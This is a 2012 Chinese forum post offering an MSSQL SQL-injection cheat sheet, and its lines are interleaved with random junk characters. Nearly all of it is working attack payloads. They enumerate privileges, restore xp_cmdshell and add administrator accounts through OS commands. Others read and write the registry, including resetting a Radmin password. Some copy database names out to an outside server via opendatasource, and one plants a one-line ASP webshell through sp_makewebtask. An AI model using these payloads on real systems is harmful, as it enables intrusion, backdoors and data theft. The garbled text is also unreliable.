阿D常用的一些注入命令. p" _' w# U4 ]5 K L9 Y' |
//看看是什么权限的
" J% k% X4 S5 O! M; jand 1=(Select IS_MEMBER('db_owner'))
2 v# H2 y5 Z: N7 d5 ]( [And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--% K- E7 O3 r) _
: A/ l3 O9 d: }% h4 w' g$ i9 H
//检测是否有读取某数据库的权限" u& U) x! ^8 {) _
and 1= (Select HAS_DBACCESS('master'))
: W. m. |& Y1 H' F: ZAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --' z0 Y5 W, i+ ?9 Z: _1 ^
. q3 V/ o* X s4 |8 n3 H
; `5 I# i# |% i7 }$ F
数字类型
3 \" q* C, E: @2 g4 Aand char(124)%2Buser%2Bchar(124)=0( J y+ d" w* p+ c* p3 j, ]. [
; J6 S0 m$ B* R6 M, i字符类型
: d; h7 W/ V3 M. k6 @; p$ u' and char(124)%2Buser%2Bchar(124)=0 and ''='
( H# f1 F7 }, L* |, r0 Q. Y' Y( S7 s) @9 Y0 M! w
搜索类型
) S/ D. \+ g& T1 b8 e" Q0 {2 _' and char(124)%2Buser%2Bchar(124)=0 and '%'='
+ X, O" f0 W- g( x, o+ f+ @$ {( d6 {$ {
爆用户名
/ O7 ~: f( {1 _+ u; M% E g" Iand user>02 k% R+ \* K5 P, S7 A7 n' E. ]
' and user>0 and ''='
' Z( d m V" b' h9 X5 ]* H# x. ~2 k, V9 p
检测是否为SA权限
3 d9 G) }9 J1 s, n5 F4 Aand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
( P* {1 v' |) T4 E9 u" r9 eAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
% b, J' o. T* U( ]( a0 z4 v) K* v6 h$ [- J7 K8 n
检测是不是MSSQL数据库
# n4 a# j2 l, r* ]and exists (select * from sysobjects);--
9 j' v i l" o* @; Q( s1 H$ L' H Q# h3 j* V# b- @4 X
检测是否支持多行4 t {" m! g1 S- P# e! T$ i
;declare @d int;--
; m8 Z0 C% W: g' R; Y
; @& ~! P/ h5 t+ ?恢复 xp_cmdshell, ~* R% I$ V8 n% {. G: _3 q
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
9 ]* [: [9 q C$ x0 b% U+ ?- n `/ b6 J- [7 f2 y8 \+ @
. M8 e, E6 M1 l8 G9 p$ B- m
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') 9 v9 {2 J. d3 R
0 P5 T3 ]/ x( j* v* Q
//-----------------------( z; I8 \! R% R; M# W# C. z' H/ u+ L
// 执行命令
) n0 G8 E1 C' g//-----------------------
* W" |8 h* n* t, }2 C& t- Q首先开启沙盘模式:6 r$ |2 S% t0 j5 o T
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
, d5 p" I" M4 U( y- f# V8 r
/ b: j- B7 n/ `6 {7 O) n" W& \然后利用jet.oledb执行系统命令/ \! Z0 Q' q# H8 i" G3 _3 P
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')+ n& a1 N% W$ V
9 J: x1 f C9 n, D6 m执行命令" r( c) p* }# p2 I5 c
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
) z+ A, p& R) b7 ~5 s/ M' V6 |* h) a% T
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
/ Z2 s( S: e8 g4 Y1 M
7 J! f- q! \! P: B4 B9 O3 F判断xp_cmdshell扩展存储过程是否存在:, Q/ r3 g7 W; ?% V* T$ }& S' m! u: E
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')5 n& e: Q3 e% Y, {
L, Z$ c4 B0 ^0 A8 X
写注册表
4 ^. e9 v# C" F( F8 s8 Mexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
" O% a7 `+ _6 _& p) j: m4 H+ U: }: ~2 K* R
REG_SZ1 V1 d$ B7 G, G, i
) u& Y4 R% `4 }7 k8 w读注册表
* O* i" x6 x' h; o8 [exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit': f6 i' o: L0 V% n! R" k L
+ s" b4 K( b9 \. j5 l' Q
读取目录内容. @! r5 E0 k8 B! v5 `% u' y
exec master..xp_dirtree 'c:\winnt\system32\',1,1
. B" z( c8 G/ |6 S) p# J3 @4 \+ u- ^ ~3 B# N6 \
2 j" i$ g2 c) t6 k( d数据库备份0 Q/ A8 b- d. c: T1 D& C
backup database pubs to disk = 'c:\123.bak'
/ Z+ ]2 @3 o6 z* J2 o/ M3 N2 {/ X+ k9 p7 ?
//爆出长度
" z- z! X' Z+ q/ X# m DAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
4 ?0 |9 g! O4 F" Q/ i# [) D2 Y7 ]) q" x$ j/ M% N
8 l$ B! h4 g* d% E! X9 Y. G
9 ]& T/ P8 H. I) n; L: s+ v; N
更改sa口令方法:用sql综合利用工具连接后,执行命令:! s* j' w4 C" E# @3 r( z( c; n6 C
exec sp_password NULL,'新密码','sa'2 {: U6 H2 |+ D, _5 _
" W: @% S/ s, @ \添加和删除一个SA权限的用户test:; a9 F6 }) N6 A
exec master.dbo.sp_addlogin test,ptlove) f4 O; z6 b) |6 A) d# Z. a& g0 F
exec master.dbo.sp_addsrvrolemember test,sysadmin4 I. R" o% R# s3 O3 r2 J i8 E
5 J, o T" S1 _" W+ |
删除扩展存储过过程xp_cmdshell的语句:
6 c ]" v2 f1 a* Q+ ]exec sp_dropextendedproc 'xp_cmdshell'+ B. H v0 u' _. q6 o
4 Z2 i- }" }4 o# f' y( R, K添加扩展存储过过程
+ ~% G' y+ y: L! X& rEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' 8 o) @4 a* {5 d
GRANT exec On xp_proxiedadata TO public
( r5 ?, m: x5 f
9 a* f9 G3 Q- }# `* V( M( F/ N& {1 N: G; H% |: ^8 `3 s# m
停掉或激活某个服务。
( B* q" u- j/ T( f2 l( f$ ]( I+ _/ b/ `# P; F( E+ O8 Z* K
exec master..xp_servicecontrol 'stop','schedule'' a: U7 P, e8 B1 b
exec master..xp_servicecontrol 'start','schedule'3 A$ I' I, l* g
6 c5 P$ C$ D* a0 j7 n
dbo.xp_subdirs
! K5 f0 p/ J) F k. w* ~5 n [, O; g0 N/ M3 P4 m; K+ M7 M9 j
只列某个目录下的子目录。
" B" B; P% k8 i5 d; _* b1 Wxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'( C; N' K* b, B# V
0 u. t4 p" A+ S
dbo.xp_makecab
+ @8 @ `( T0 ?6 N1 l; c2 o8 n$ L0 n: b+ @" _% H
将目标多个档案压缩到某个目标档案之内。4 F; o _4 r" g/ \
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
5 N; T4 a ?+ V& a }+ H
: ^6 q: k. r3 Ndbo.xp_makecab6 j2 q8 C6 C- V& L' C
'c:\test.cab','mszip',1,
' n" N$ ?! O- n; v3 d'C:\Inetpub\wwwroot\SQLInject\login.asp',4 |: I' @! b$ u! Q! x- K" P
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'6 C# G8 ~; g& r
Q. e: |2 | O: gxp_terminate_process
, U. x- Y/ @, d. _" d$ ^# O) c! v" h
停掉某个执行中的程序,但赋予的参数是 Process ID。% E: f' e" c- Z( \4 F- S) W+ \
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID# t; F1 m `& p T+ o) G9 C
N2 U( j7 W- W& N1 x5 j. l
xp_terminate_process 2484
. L2 @- t$ `% b& e& t6 w
# k4 H7 [4 g- D1 L# ~, ~xp_unpackcab
: E' t* {9 `* X3 I9 z
# n; H! n7 X+ p6 `- E3 P4 m解开压缩档。( t a; T$ k! c; l% f" |( v
2 f3 | ?% Z/ N6 Q' U* ^/ o# {
xp_unpackcab 'c:\test.cab','c:\temp',1+ C0 y$ s/ ]' `! w$ h2 l0 ?0 [( O
& d ~! |' x: {5 |5 L5 `
( ^- [4 E2 R# {* v. M) u0 u( D某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234 e; B t7 G, D
+ @/ h; M9 E6 w+ Y+ Ecreate database lcx;
+ J2 g0 v' a/ I9 h/ r3 y$ A- GCreate TABLE ku(name nvarchar(256) null);
5 n, x& Y( u6 ?! N7 Q- E. gCreate TABLE biao(id int NULL,name nvarchar(256) null);
* _/ [: y7 i [1 z8 V$ I8 x/ {
//得到数据库名
" {' w- b* }/ g" Einsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases p. ?5 s+ S% M0 e' k1 u' L. ]0 D
3 F$ J4 i1 d+ _# X8 W* G
3 t9 J; E( v: i5 D, E5 R
//在Master中创建表,看看权限怎样
2 ?1 S9 G- M/ w6 u: k1 K1 X6 ~Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--9 |$ h( U; m; G2 E
5 x( H* c' O9 u
用 sp_makewebtask直接在web目录里写入一句话马:# x3 Q8 U+ ^ c) v
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--) m$ I8 s( K& f2 k8 ?6 Q
- \0 f; O7 \ ?2 Y! W0 w( @//更新表内容
4 V( T6 i6 O4 N( bUpdate films SET kind = 'Dramatic' Where id = 123
' b4 J8 p( M- u: L% T3 i' n4 `
$ Q$ S7 g! M% t. n. o f: [//删除内容$ W, w' u4 ]* L* m" h
delete from table_name where Stockid = 3 |
发表于 2012-9-13 17:26:30
收藏
支持
反对